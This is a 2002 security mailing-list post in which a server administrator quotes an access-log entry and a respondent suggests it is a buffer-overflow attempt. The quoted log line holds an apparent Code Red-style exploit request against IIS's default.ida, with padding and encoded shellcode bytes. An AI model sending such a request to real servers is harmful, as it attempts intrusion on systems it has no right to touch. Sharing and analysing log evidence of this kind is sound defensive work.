[Dshield] server access log question

John Draper crunch at shopip.com
Wed Oct 16 04:34:58 GMT 2002


>Does anyone know what an entry like this in a server access log means:
>
>65.88.244.4 - - [12/Oct/2002:03:01:16 -0400] "GET 
>/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
>  HTTP/1.0" 400 252 "-" "-"

Looks like someone is hitting your server with a buffer overflow....   Aren't the "N" a NOP instruction?

John





More information about the list mailing list